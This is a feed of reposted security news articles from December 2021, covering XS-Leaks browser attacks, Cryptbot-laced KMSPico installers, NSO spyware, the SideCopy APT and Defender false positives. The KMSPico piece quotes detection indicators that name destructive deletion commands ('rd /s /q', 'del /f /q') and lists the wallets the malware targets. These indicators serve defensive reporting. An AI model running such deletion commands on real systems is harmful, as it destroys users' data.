	The new class of vulnerabilities is also different from a cross-site request forgery (CSRF) attack in that unlike the latter, which exploits a web application's trust in a browser client to execute unintended actions on behalf of the user, they can be weaponized to infer information about a user.
</p>

<p>
	 
</p>

<p>
	"They are a significant threat to Internet privacy since simply visiting a web page may reveal if the victim is a drug addict or leak a sexual orientation," the researchers explained. "XS-Leaks take advantage of small pieces of information which are exposed during interactions between websites […] to reveal sensitive information about users, such as their data in other web applications, details about their local environment, or internal networks they are connected to."
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="AVvXsEhZPg_ZUm0LRYYdf3QhgpM95lQ9M_VI0z2S" class="ipsImage" data-ratio="75.10" height="540" width="548" src="https://thehackernews.com/new-images/img/a/AVvXsEhZPg_ZUm0LRYYdf3QhgpM95lQ9M_VI0z2SeI-tURRXUd-lYKqP6fZCwnXtU3sNHjvaHDfDApe67JN0X9Pm9eB3bnWFaQJTg6SELFTuyZyztAttT92mc7bCByjCauIBEa_WlwKOM4JlSfMsAz1E-l7xUoPoERkZvrCwEjk12uqHhmQw1VX2VJodQy8o" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	The core idea is that while websites are not allowed to directly access data (i.e., read server responses) on other websites because of same-origin constraints, a rogue online portal can attempt to load a specific resource or an API endpoint from a website, say, an online banking website, on the user's browser and draw inferences about the victim's transaction history. Alternatively, the source of the leak could be timing-based side-channels or speculative execution attacks like Meltdown and Spectre.
</p>

<p>
	 
</p>

<p>
	As mitigations, the researchers recommend denying all event handler messages, minimizing error message occurrences, applying global limit restrictions, and creating a new history property when redirection occurs. On the end-user side, turning on first-party isolation as well as Enhanced Tracking Prevention in Firefox has been found to decrease the applicability of XS-Leaks. Intelligent Tracking Prevention in Safari, which blocks third-party cookies by default, also prevents all leaks that are not based on a pop-up.
</p>

<p>
	 
</p>

<p>
	"The root cause of most XS-Leaks is inherent to the design of the web," the researchers said. "Oftentimes applications are vulnerable to some cross-site information leaks without having done anything wrong. It is challenging to fix the root cause of XS-Leaks at the browser level because in many cases doing so would break existing websites."
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2021/12/14-new-xs-leaks-cross-site-leaks.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3565</guid><pubDate>Mon, 06 Dec 2021 13:43:28 +0000</pubDate></item><item><title>Malicious KMSPico installers steal your cryptocurrency wallets</title><link>https://nsaneforums.com/news/security-privacy-news/malicious-kmspico-installers-steal-your-cryptocurrency-wallets-r3563/</link><description><![CDATA[<p>
	Threat actors are distributing altered KMSPico installers to infect Windows devices with malware that steals cryptocurrency wallets.
</p>

<p>
	 
</p>

<p>
	This activity has been spotted by researchers at Red Canary, who warn that pirating software to save on licensing costs isn't worth the risk.
</p>

<p>
	 
</p>

<p>
	KMSPico is a popular Microsoft Windows and Office product activator that emulates a Windows Key Management Services (KMS) server to activate licenses fraudulently.
</p>

<p>
	 
</p>

<p>
	According to Red Canary, the number of IT departments using KMSPico instead of legitimate Microsoft software licenses is much bigger than one would expect.
</p>

<p>
	 
</p>

<p>
	"We've observed several IT departments using KMSPico instead of legitimate Microsoft licenses to activate systems," explained Red Canary intelligence analyst Tony Lambert. 
</p>

<p>
	 
</p>

<p>
	"In fact, we even experienced one ill-fated incident response engagement where our IR partner could not remediate one environment due to the organization not having a single valid Windows license in the environment."
</p>

<h2>
	Tainted product activators
</h2>

<p>
	KMSPico is commonly distributed through pirated software and cracks sites that wrap the tool in installers containing adware and malware.
</p>

<p>
	 
</p>

<p>
	As you can see below, there are numerous sites created to distribute KMSPico, all claiming to be the official site.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="KMS_pico.jpg" class="ipsImage" data-ratio="76.81" height="540" width="341" src="https://www.bleepstatic.com/images/news/u/1220909/Website%20snaps/KMS_pico.jpg">
		</p>

		<figcaption>
			Most Google Search results are sites that claim to be official
		</figcaption>
	</figure>
</div>

<p>
	A malicious KMSPico installer analyzed by Red Canary comes in a self-extracting executable like 7-Zip and contains both an actual KMS server emulator and <a href="https://www.bleepingcomputer.com/news/security/fake-vpn-site-pushes-cryptbot-and-vidar-info-stealing-trojans/" target="_blank" rel="external nofollow">Cryptbot</a>.
</p>

<p>
	 
</p>

<p>
	"The user becomes infected by clicking one of the malicious links and downloads either KMSPico, Cryptbot, or another malware without KMSPico," explains a <a href="https://redcanary.com/wp-content/uploads/2021/12/KMSPico-V5.pdf" rel="external nofollow" target="_blank">technical analysis</a> of the campaign.
</p>

<p>
	 
</p>

<p>
	"The adversaries install KMSPico also, because that is what the victim expects to happen, while simultaneously deploying Cryptbot behind the scenes."
</p>

<p>
	 
</p>

<p>
	The malware is wrapped by the <a href="https://www.bleepingcomputer.com/news/security/bitbucket-abused-to-infect-500-000-hosts-with-malware-cocktail/" target="_blank" rel="external nofollow">CypherIT</a> packer, which obfuscates the installer to prevent it from being detected by security software. This installer then launches a script that is also heavily obfuscated and is capable of detecting sandboxes and AV emulation, so it won't execute when run on the researchers' analysis devices.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="obfuscated_code.jpg" class="ipsImage" data-ratio="75.10" height="429" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/obfuscated_code.jpg">
		</p>

		<figcaption>
			Obfuscated code of Cryptbot<br>
			Source: Red Canary
		</figcaption>
	</figure>
</div>

<p>
	Moreover, Cryptbot checks for the presence of "%APPDATA%\Ramson" and executes its self-deletion routine if the folder exists, to prevent re-infection.
</p>

<p>
	 
</p>

<p>
	The injection of the Cryptbot bytes into memory occurs through the process hollowing method, while the malware's operational features overlap with previous research findings.
</p>

<p>
	 
</p>

<p>
	In summary, Cryptbot is capable of collecting sensitive data from the following apps:
</p>

<p>
	 
</p>

<ul>
	<li>
		Atomic cryptocurrency wallet
	</li>
	<li>
		Avast Secure web browser
	</li>
	<li>
		Brave browser
	</li>
	<li>
		Ledger Live cryptocurrency wallet
	</li>
	<li>
		Opera Web Browser
	</li>
	<li>
		Waves Client and Exchange cryptocurrency applications
	</li>
	<li>
		Coinomi cryptocurrency wallet
	</li>
	<li>
		Google Chrome web browser
	</li>
	<li>
		Jaxx Liberty cryptocurrency wallet
	</li>
	<li>
		Electron Cash cryptocurrency wallet
	</li>
	<li>
		Electrum cryptocurrency wallet
	</li>
	<li>
		Exodus cryptocurrency wallet
	</li>
	<li>
		Monero cryptocurrency wallet
	</li>
	<li>
		MultiBitHD cryptocurrency wallet
	</li>
	<li>
		Mozilla Firefox web browser
	</li>
	<li>
		CCleaner web browser
	</li>
	<li>
		Vivaldi web browser
	</li>
</ul>

<p>
	 
</p>

<p>
	Because Cryptbot’s operation doesn’t rely on the existence of unencrypted binaries on the disk, detecting it is only possible by monitoring for malicious behavior such as PowerShell command execution or external network communication.
</p>

<p>
	 
</p>

<p>
	Red Canary shares the following four key points for threat detection:
</p>

<p>
	 
</p>

<ul>
	<li>
		binaries that contain AutoIT metadata but don’t have “AutoIT” in their filenames
	</li>
	<li>
		AutoIT processes making external network connections
	</li>
	<li>
		findstr commands similar to findstr /V /R “^ … $
	</li>
	<li>
		PowerShell or cmd.exe commands containing rd /s /q, timeout, and del /f /q together
	</li>
</ul>

<p>
	 
</p>

<p>
	In summary, if you thought that KMSPico is a smart way to save on unnecessary licensing costs, the above illustrates why <a href="https://www.bleepingcomputer.com/forums/t/683336/infected-with-malware-after-trying-to-install-kmspico/" target="_blank" rel="external nofollow">that's a bad idea</a>.
</p>

<p>
	 
</p>

<p>
	The reality is that the loss of revenue due to incident response, <a href="https://www.bleepingcomputer.com/news/security/meet-stop-ransomware-the-most-active-ransomware-nobody-talks-about/" target="_blank" rel="external nofollow">ransomware attacks</a>, and cryptocurrency theft from installing pirated software could be more than the cost of the actual Windows and Office licenses.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/malicious-kmspico-installers-steal-your-cryptocurrency-wallets/" rel="external nofollow">Malicious KMSPico installers steal your cryptocurrency wallets</a>
</p>
]]></description><guid isPermaLink="false">3563</guid><pubDate>Sun, 05 Dec 2021 22:07:01 +0000</pubDate></item><item><title>U.S. State Department phones hacked with Israeli company spyware - sources</title><link>https://nsaneforums.com/news/security-privacy-news/us-state-department-phones-hacked-with-israeli-company-spyware-sources-r3554/</link><description><![CDATA[<p>
	WASHINGTON/SAN FRANCISCO, Dec 3 (Reuters) - Apple Inc iPhones of at least nine U.S. State Department employees were hacked by an unknown assailant using sophisticated spyware developed by the Israel-based NSO Group, according to four people familiar with the matter.
</p>

<p>
	 
</p>

<p>
	The hacks, which took place in the last several months, hit U.S. officials either based in Uganda or focused on matters concerning the East African country, two of the sources said.
</p>

<p>
	 
</p>

<p>
	The intrusions, first reported by Reuters, represent the widest known hacks of U.S. officials through NSO technology. Previously, a list of numbers with potential targets including some American officials surfaced in reporting on NSO, but it was not clear whether intrusions were always tried or succeeded.
</p>

<p>
	 
</p>

<p>
	Reuters could not determine who launched the latest cyberattacks.
</p>

<p>
	 
</p>

<p>
	NSO Group said in a statement on Thursday that it did not have any indication their tools were used but canceled access for the relevant customers and would investigate based on the Reuters inquiry.
</p>

<p>
	 
</p>

<p>
	"If our investigation shall show these actions indeed happened with NSO's tools, such customer will be terminated permanently and legal actions will take place," said an NSO spokesperson, who added that NSO will also "cooperate with any relevant government authority and present the full information we will have."
</p>

<p>
	 
</p>

<p>
	NSO has long said it only sells its products to government law enforcement and intelligence clients, helping them to monitor security threats, and is not directly involved in surveillance operations.
</p>

<p>
	 
</p>

<p>
	Officials at the Uganda embassy in Washington did not comment. A spokesperson for Apple declined to comment.
</p>

<p>
	 
</p>

<p>
	A State Department spokesperson declined to comment on the intrusions, instead pointing to the Commerce Department's recent decision to place the Israeli company on an entity list, making it harder for U.S. companies to do business with them.
</p>

<p>
	 
</p>

<p>
	NSO Group and another spyware firm were "added to the Entity List based on a determination that they developed and supplied spyware to foreign governments that used this tool to maliciously target government officials, journalists, businesspeople, activists, academics, and embassy workers," the Commerce Department said in an announcement last month.
</p>

<p>
	 
</p>

<p>
	EASILY IDENTIFIABLE
</p>

<p>
	 
</p>

<p>
	NSO software is capable of not only capturing encrypted messages, photos and other sensitive information from infected phones, but also turning them into recording devices to monitor surroundings, based on product manuals reviewed by Reuters.
</p>

<p>
	 
</p>

<p>
	Apple's alert to affected users did not name the creator of the spyware used in this hack.
</p>

<p>
	 
</p>

<p>
	The victims notified by Apple included American citizens and were easily identifiable as U.S. government employees because they associated email addresses ending in state.gov with their Apple IDs, two of the people said.
</p>

<p>
	 
</p>

<p>
	They and other targets notified by Apple in multiple countries were infected through the same graphics processing vulnerability that Apple did not learn about and fix until September, the sources said.
</p>

<p>
	 
</p>

<p>
	Since at least February, this software flaw allowed some NSO customers to take control of iPhones simply by sending invisible yet tainted iMessage requests to the device, researchers who investigated the espionage campaign said.
</p>

<p>
	 
</p>

<p>
	The victims would not see or need to interact with a prompt for the hack to be successful. Versions of NSO surveillance software, commonly known as Pegasus, could then be installed.
</p>

<p>
	 
</p>

<p>
	Apple's announcement that it would notify victims came on the same day it sued NSO Group last week, accusing it of helping numerous customers break into Apple's mobile software, iOS.
</p>

<p>
	 
</p>

<p>
	In a public response, NSO has said its technology helps stop terrorism and that they've installed controls to curb spying against innocent targets.
</p>

<p>
	For example, NSO says its intrusion system cannot work on phones with U.S. numbers beginning with the country code +1.
</p>

<p>
	 
</p>

<p>
	But in the Uganda case, the targeted State Department employees were using iPhones registered with foreign telephone numbers, said two of the sources, without the U.S. country code.
</p>

<p>
	 
</p>

<p>
	Uganda has been roiled this year by an election with reported irregularities, protests and a government crackdown. U.S. officials have tried to meet with opposition leaders, drawing ire from the Ugandan government. Reuters has no evidence the hacks were related to current events in Uganda.
</p>

<p>
	 
</p>

<p>
	A senior Biden administration official, speaking on condition he not be identified, said the threat to U.S. personnel abroad was one of the reasons the administration was cracking down on companies such as NSO and pursuing new global discussion about spying limits.
</p>

<p>
	 
</p>

<p>
	The official added that the government has seen "systemic abuse" in multiple countries involving NSO's Pegasus spyware.
</p>

<p>
	 
</p>

<p>
	Sen. Ron Wyden, who is on the Senate Intelligence Committee, said: "Companies that enable their customers to hack U.S. government employees are a threat to America's national security and should be treated as such."
</p>

<p>
	 
</p>

<p>
	Historically, some of NSO Group's best-known past clients included Saudi Arabia, the United Arab Emirates and Mexico.
</p>

<p>
	 
</p>

<p>
	The Israeli Ministry of Defense must approve export licenses for NSO, which has close ties to Israel's defense and intelligence communities, to sell its technology internationally.
</p>

<p>
	 
</p>

<p>
	In a statement, the Israeli embassy in Washington said that targeting American officials would be a serious breach of its rules.
</p>

<p>
	 
</p>

<p>
	"Cyber products like the one mentioned are supervised and licensed to be exported to governments only for purposes related to counter-terrorism and severe crimes," an embassy spokesperson said. "The licensing provisions are very clear and if these claims are true, it is a severe violation of these provisions."
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.reuters.com/technology/exclusive-us-state-department-phones-hacked-with-israeli-company-spyware-sources-2021-12-03/" rel="external nofollow">Source</a></strong>
</p>

<p>
	 
</p>

<p>
	<em>Also: <a href="https://thehackernews.com/2021/12/pegasus-spyware-reportedly-hacked.html" rel="external nofollow"> Pegasus Spyware Reportedly Hacked iPhones of U.S. State Department and Diplomats.</a></em>
</p>
]]></description><guid isPermaLink="false">3554</guid><pubDate>Sat, 04 Dec 2021 03:19:53 +0000</pubDate></item><item><title>Researchers discover 14 new data-stealing web browser attacks</title><link>https://nsaneforums.com/news/security-privacy-news/researchers-discover-14-new-data-stealing-web-browser-attacks-r3549/</link><description><![CDATA[<p>
	IT security researchers from Ruhr-Universität Bochum (RUB) and the Niederrhein University of Applied Sciences have discovered 14 new types of 'XS-Leak' cross-site leak attacks against modern web browsers, including Google Chrome, Microsoft Edge, Safari, and Mozilla Firefox.
</p>

<p>
	 
</p>

<p>
	These types of side-channel attacks are called 'XS-Leaks,' and they allow attackers to bypass the 'same-origin' policy in web browsers so that a malicious website can steal information in the background from a trusted website where the user enters information.
</p>

<p>
	 
</p>

<p>
	"The principle of an XS-Leak is to use such side-channels available on the web to reveal sensitive information about users, such as their data in other web applications, details about their local environment, or internal networks they are connected to," explains the <a href="https://xsleaks.dev/" rel="external nofollow" target="_blank">XS-Leaks wiki</a>.
</p>

<p>
	 
</p>

<p>
	For example, an XS-Leak attack could help a background site siphon the email inbox contents from an active tab used for accessing webmail.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="attack(1).jpg" class="ipsImage" data-ratio="61.99" height="305" width="492" src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/attack(1).jpg">
		</p>

		<figcaption>
			The process of an XS-Leak<br>
			Source: XSinator
		</figcaption>
	</figure>
</div>

<p>
	Cross-site leaks aren't new, but as the researchers point out, not all of them have been identified and classified as XS-Leaks, and their root cause remains unclear.
</p>

<p>
	 
</p>

<p>
	Their research aims to systematically search for new XS-Leaks, evaluate potential mitigations, and generally gain a better understanding of how they work.
</p>

<h2>
	Finding new XS-Leaks
</h2>

<p>
	<a href="https://news.rub.de/english/press-releases/2021-12-02-it-security-14-new-attacks-web-browsers-detected" rel="external nofollow" target="_blank">The researchers</a> first identified three characteristics of cross-site leaks and evaluated all inclusion methods and leak techniques for a large set of web browsers.
</p>

<p>
	 
</p>

<p>
	The three main ingredients of all XS-Leaks are inclusion methods, leak techniques, and detectable differences.
</p>

<p>
	 
</p>

<p>
	After creating a model based on the above, the researchers found 34 XS-Leaks, 14 of which were novel (marked with a plus sign below).
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="new_attacks_table.jpg" class="ipsImage" data-ratio="75.10" height="540" width="592" src="https://www.bleepstatic.com/images/news/u/1220909/Tables/new_attacks_table.jpg">
		</p>

		<figcaption>
			All of the XS-Leaks identified in the study.<br>
			Source: XSinator
		</figcaption>
	</figure>
</div>

<p>
	Next, they tested the 34 XS-Leaks against 56 combinations of browsers and operating systems to determine how vulnerable each of them was.
</p>

<p>
	 
</p>

<p>
	Then they built a web application named XSinator, consisting of three components:
</p>

<p>
	 
</p>

<ol>
	<li>
		A testing site that acts as the attacker page, implementing known and novel XS-Leaks
	</li>
	<li>
		A vulnerable web app that simulates the behavior of a state-dependent resource.
	</li>
	<li>
		A database containing all previous test results.
	</li>
</ol>

<p>
	 
</p>

<p>
	You can visit the <a href="https://xsinator.com/" rel="external nofollow" target="_blank">XSinator page</a> yourself and run the test to see how well your web browser and OS fare against the 34 XS-Leaks.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="xs-leaks-chrome.jpg" class="ipsImage" data-ratio="75.10" height="433" width="720" src="https://www.bleepstatic.com/images/news/web-browsers/chrome/xs-leaks-chrome.jpg">
		</p>

		<figcaption>
			Testing against the latest version of Google Chrome<br>
			Source: BleepingComputer
		</figcaption>
	</figure>
</div>

<p>
	You can find a full list of XS-leaks that various browsers are vulnerable to below:
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="evaluation_table.jpg" class="ipsImage" data-ratio="75.10" height="540" width="505" src="https://www.bleepstatic.com/images/news/u/1220909/Tables/evaluation_table.jpg">
		</p>

		<figcaption>
			Sample results from the team's evaluation<br>
			Source: XSinator
		</figcaption>
	</figure>
</div>

<h2>
	How to defend against XS-Leaks
</h2>

<p>
	Mitigating the risks that arise from these side-channel attacks is something that needs to be addressed by browser developers.
</p>

<p>
	 
</p>

<p>
	Researchers suggest denying all event handler messages, minimizing error message occurrences, applying global limit restrictions, and creating a new history property when redirection occurs.
</p>

<p>
	 
</p>

<p>
	Other effective mitigation methods are using X-Frame-Options to prevent iframe elements from loading HTML resources and implementing the CORP header to control if pages can embed a resource.
</p>

<p>
	 
</p>

<p>
	“COIU, also known as First-Party Isolation (FPI), is an optional security feature that users can enable in FF's expert settings (about:config) and was initially introduced in Tor Browser.” - from <a href="https://xsinator.com/paper.pdf" rel="external nofollow" target="_blank">the paper</a>.
</p>

<p>
	 
</p>

<p>
	One of the participating researchers, Lukas Knittel, told Bleeping Computer the following:
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	"Depending on the website, XS-Leaks can have a severe impact on users. Users can use an up-to-date browser that allows them to disable third-party cookies. This would protect against most XS-Leaks, even when the website doesn't implement new mitigations like COOP, CORP, SameSite Cookies, and so on." - Knittel.
</p>

<p>
	 
</p>

<p>
	The researcher also said they had informed the web browser development teams of their findings, and those teams are now fixing the various issues. In some cases the problems have already been fixed in the currently available versions.
</p>

<p>
	 
</p>

<p>
	As for future work, the team believes that new browser features constantly add new potential XS-Leak opportunities, so this is a space of constant interest.
</p>

<p>
	 
</p>

<p>
	Also, Knittel told us that they might explore the development of a website-scanning tool, but for now, they want to focus on determining how common these flaws are in real-world websites.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/researchers-discover-14-new-data-stealing-web-browser-attacks/" rel="external nofollow">Researchers discover 14 new data-stealing web browser attacks</a>
</p>
]]></description><guid isPermaLink="false">3549</guid><pubDate>Fri, 03 Dec 2021 22:34:09 +0000</pubDate></item><item><title>Researchers Detail How Pakistani Hackers Targeting Indian and Afghan Governments</title><link>https://nsaneforums.com/news/security-privacy-news/researchers-detail-how-pakistani-hackers-targeting-indian-and-afghan-governments-r3545/</link><description><![CDATA[<p>
	A Pakistani threat actor successfully socially engineered a number of ministries in Afghanistan and a shared government computer in India to steal sensitive Google, Twitter, and Facebook credentials from its targets and stealthily obtain access to government portals.
</p>

<p>
	 
</p>

<p>
	Malwarebytes' latest findings go into detail about the new tactics and tools adopted by the APT group known as SideCopy, which is so-called because of its attempts to mimic the infection chains associated with another group tracked as SideWinder and mislead attribution.
</p>

<p>
	 
</p>

<p>
	"The lures used by SideCopy APT are usually archive files that have embedded one of these files: LNK, Microsoft Publisher or Trojanized Applications," Malwarebytes researcher Hossein Jazi said, adding the embedded files are tailored to target government and military officials based in Afghanistan and India.
</p>

<p>
	 
</p>

<p>
	The revelation comes close on the heels of disclosures that Meta took steps to block malicious activities carried out by the group on its platform by using romantic lures to compromise individuals with ties to the Afghan government, military, and law enforcement in Kabul.
</p>

<p>
	 
</p>

<p>
	Some of the prominent attacks were waged against personnel associated with the Administration Office of the President (AOP) of Afghanistan as well as the Ministry of Foreign Affairs, Ministry of Finance, and the National Procurement Authority, resulting in the theft of social media passwords and password-protected documents. SideCopy also broke into a shared computer in India and harvested credentials from government and education services.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="AVvXsEg4Le635k0LinBG8EQw0em8hzxIygd2qBDH" class="ipsImage" data-ratio="52.78" height="375" width="720" src="https://thehackernews.com/new-images/img/a/AVvXsEg4Le635k0LinBG8EQw0em8hzxIygd2qBDHw2aSrFAKwnBZcRQfBdvZcZkgLH77zEUk6Ke4iwzvIQDkD7iGcAQ6wL0hKNfLj7947Zb2on1tZVYI7Evwv_tNk1uDt3ZuD_2BFI1XlYD3LXqMayTuOVLfRj5Rfy6e9DDf72drgqdaN89-V6jU2IXGNV_f" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	In addition, the actor is said to have siphoned several Microsoft Office documents, including names, numbers, and email addresses of officials, and databases containing information related to identity cards, diplomatic visas, and asset registrations from Afghan government websites, all of which are expected to be used as future decoys or to fuel further attacks against the individuals themselves.
</p>

<p>
	 
</p>

<p>
	The cyber espionage campaign observed by Malwarebytes involves the target opening the lure document, leading to the execution of a loader that's used to drop a next-stage remote access trojan called ActionRAT, which is capable of uploading files, executing commands received from a server, and even downloading more payloads.
</p>

<p>
	 
</p>

<p>
	Also dropped by the loader is a new information stealer dubbed AuTo Stealer, which is programmed to collect Microsoft Office files, PDF documents, text files, database files, and images before exfiltrating the information to its server over HTTP or TCP.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="AVvXsEjqzyHHUTAMui8gNbLuiFULlyxx8-rvCp69" class="ipsImage" data-ratio="69.44" height="495" width="720" src="https://thehackernews.com/new-images/img/a/AVvXsEjqzyHHUTAMui8gNbLuiFULlyxx8-rvCp690mnYOsP8EaS0mkkcUo7lXy0ffU3mIyy30VKIWa8yiIgMQ-AYUovQM6fNmHt9p0_sNA64OFegsc0GJeMpzxLJegGUeT8WcknQAOpvWm44fyLwtdS18Jgo4hhCOSoqw-Tgi9Lu8mFiHxbnzsd0yCVUrA0W" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	This is far from the first time SideCopy APT's tactics have come to light. In September 2020, cybersecurity firm Quick Heal revealed specifics about an espionage attack aimed at Indian defense units and armed forces personnel since at least 2019 with the aim of stealing sensitive information.
</p>

<p>
	 
</p>

<p>
	Then earlier this July, Cisco Talos researchers exposed the hacking group's myriad infection chains delivering bespoke and commodity remote access trojans such as CetaRAT, Allakore, and njRAT in what they called an expansion of malware campaigns targeting entities in India.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2021/12/researchers-detail-how-pakistani.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3545</guid><pubDate>Fri, 03 Dec 2021 14:37:42 +0000</pubDate></item><item><title>Microsoft Defender scares admins with Emotet false positives</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-defender-scares-admins-with-emotet-false-positives-r3527/</link><description><![CDATA[<p>
	Microsoft Defender for Endpoint is currently blocking Office documents from being opened and some executables from launching due to a false positive tagging the files as potentially bundling an Emotet malware payload.
</p>

<p>
	 
</p>

<p>
	Windows system admins are reporting [<a href="https://twitter.com/ChrisBarnesInfo/status/1465759131218984964" rel="external nofollow" target="_blank">1</a>, <a href="https://twitter.com/lunderquist2/status/1465805631370182660" rel="external nofollow" target="_blank">2</a>, <a href="https://www.reddit.com/r/sysadmin/comments/r5y8wv/msdefender_detect_emotet_in_microsoft_excel/" rel="external nofollow" target="_blank">3</a>, <a href="https://twitter.com/search?q=PowEmotet&amp;src=typed_query&amp;f=live" rel="external nofollow" target="_blank">4</a>, <a href="https://www.reddit.com/search/?q=PowEmotet" rel="external nofollow" target="_blank">5</a>] that this has been happening since updating Microsoft's enterprise endpoint security platform (previously known as Microsoft Defender ATP) definitions to version 1.353.1874.0.
</p>

<p>
	 
</p>

<p>
	When triggered, Defender for Endpoint will block the file from opening and throw an error mentioning suspicious activity linked to <a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/PowEmotet.SB&amp;ThreatID=2147805329" rel="external nofollow" target="_blank">Win32/PowEmotet.SB</a> or <a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/PowEmotet.SC" rel="external nofollow" target="_blank">Win32/PowEmotet.SC</a>.
</p>

<p>
	 
</p>

<p>
	"We're seeing issues with definition update 1.353.1874.0 detecting printing as Win32/PowEmotet.SB this afternoon," one admin <a href="https://twitter.com/SydeEyeDotCom/status/1465800720821727235" rel="external nofollow" target="_blank">said</a>.
</p>

<p>
	 
</p>

<p>
	"We are seeing this detected for Excel, any Office app using MSIP.ExecutionHost.exe ( AIP Sensitivity Client ) and splwow64.exe," another <a href="https://www.reddit.com/r/sysadmin/comments/r5y8wv/msdefender_detect_emotet_in_microsoft_excel/hmpyalf/" rel="external nofollow" target="_blank">added</a>.
</p>

<p>
	 
</p>

<p>
	A third one <a href="https://www.reddit.com/r/sysadmin/comments/r5y8wv/msdefender_detect_emotet_in_microsoft_excel/hmpz0jv/" rel="external nofollow" target="_blank">confirmed the issues</a> with today's definition updates: "We're seeing the same behavior specifically with v.1.353.1874.0 of the definitions, which was released today, &amp; included a definition for Behavior:Win32/PowEmotet.SB &amp; Behavior:Win32/PowEmotet.SC."
</p>

<p>
	 
</p>

<p>
	BleepingComputer was able to trigger the false positive on a Windows 10 virtual machine with the latest Microsoft Defender signatures, as shown below.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="Microsoft_Defender_Emotet_false_positive" class="ipsImage" data-ratio="75.10" height="503" width="720" src="https://www.bleepstatic.com/images/news/u/1109292/2021/Microsoft_Defender_Emotet_false_positive.png">
		</p>

		<figcaption>
			Emotet false positive in Microsoft Defender (BleepingComputer)
		</figcaption>
	</figure>
</div>

<p>
	While Microsoft hasn't yet shared any info on what causes this, the most likely reason is that the company increased the sensitivity for detecting Emotet-like behavior in updates released today, which makes Defender's generic behavioral detection engine too sensitive and prone to false positives.
</p>

<p>
	 
</p>

<p>
	The change was likely prompted by the <a href="https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/" target="_blank" rel="external nofollow">recent revival of the Emotet botnet</a> from two weeks ago, after Emotet research group <a href="https://twitter.com/Cryptolaemus1/status/1460302706954981385" rel="external nofollow" target="_blank">Cryptolaemus</a>, <a href="https://cyber.wtf/2021/11/15/guess-whos-back/" rel="external nofollow" target="_blank">GData</a>, and <a href="https://twitter.com/VK_Intel/status/1460308855129313281" rel="external nofollow" target="_blank">Advanced Intel</a> began seeing TrickBot dropping Emotet loaders on infected devices.
</p>

<p>
	 
</p>

<p>
	Even though this is almost surely not the real thing, the timing is definitely unfortunate with Emotet coming back and most Windows admins already on their toes.
</p>

<p>
	 
</p>

<p>
	As some of them have reported, they <a href="https://www.reddit.com/r/sysadmin/comments/r5y8wv/msdefender_detect_emotet_in_microsoft_excel/hmpru0o/" rel="external nofollow" target="_blank">almost took their data centers offline</a> to stop a possible Emotet infection from spreading before realizing that what they were seeing were likely false positives.
</p>

<p>
	 
</p>

<p>
	Since October 2020, Windows admins have had to deal with other Defender for Endpoint false positives, including one that <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-atp-scars-admins-with-false-cobalt-strike-alerts/" target="_blank" rel="external nofollow">showed network devices infected with Cobalt Strike</a> and another that <a href="https://www.bleepingcomputer.com/news/security/microsoft-defender-atp-detects-chrome-updates-as-php-backdoors/" target="_blank" rel="external nofollow">marked Chrome updates as PHP backdoors</a>.
</p>

<p>
	 
</p>

<p>
	Microsoft has told BleepingComputer that it has fixed the issue for cloud-connected users and is working on a fix for everyone else.
</p>

<blockquote>
	<p>
		"We are working to resolve an issue where some customers may have experienced a series of false-positive detections. This issue has been resolved for cloud-connected customers."  - a Microsoft spokesperson.
	</p>
</blockquote>

<p>
	Update 11/30/21: Added Microsoft's statement.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-scares-admins-with-emotet-false-positives/" rel="external nofollow">Microsoft Defender scares admins with Emotet false positives</a>
</p>
]]></description><guid isPermaLink="false">3527</guid><pubDate>Wed, 01 Dec 2021 06:29:21 +0000</pubDate></item><item><title>Israel Restricts Hacking Tool, Spyware Exports Amid Controversy</title><link>https://nsaneforums.com/news/security-privacy-news/israel-restricts-hacking-tool-spyware-exports-amid-controversy-r3509/</link><description><![CDATA[<p>
	<span style="font-size:20px;">Israeli companies will now be limited to selling surveillance and hacking tools to 37 countries.</span>
</p>

<p>
	 
</p>

<p>
	Israel has quietly reduced the number of countries to which its companies may sell hacking tools and spyware amid ongoing criticism from its allies over how those technologies are being used.
</p>

<p>
	 
</p>

<p>
	Calcalist reports that Israeli companies are now restricted to selling cyberweapons to democratic countries throughout Europe, members of the Five Eyes intelligence alliance, and the like. The Record says this brings those companies' potential customers down from 102 countries to 37.
</p>

<p>
	 
</p>

<p>
	These restrictions follow the US Department of Commerce's addition of two Israeli companies, NSO Group and Candiru, to the Entity List. Being put on that list makes it far more difficult for those companies to access technologies and products created by American businesses.
</p>

<p>
	 
</p>

<p>
	The Commerce Department says it acted "based on evidence that these entities developed and supplied spyware to foreign governments that used these tools to maliciously target government officials, journalists, businesspeople, activists, academics, and embassy workers."
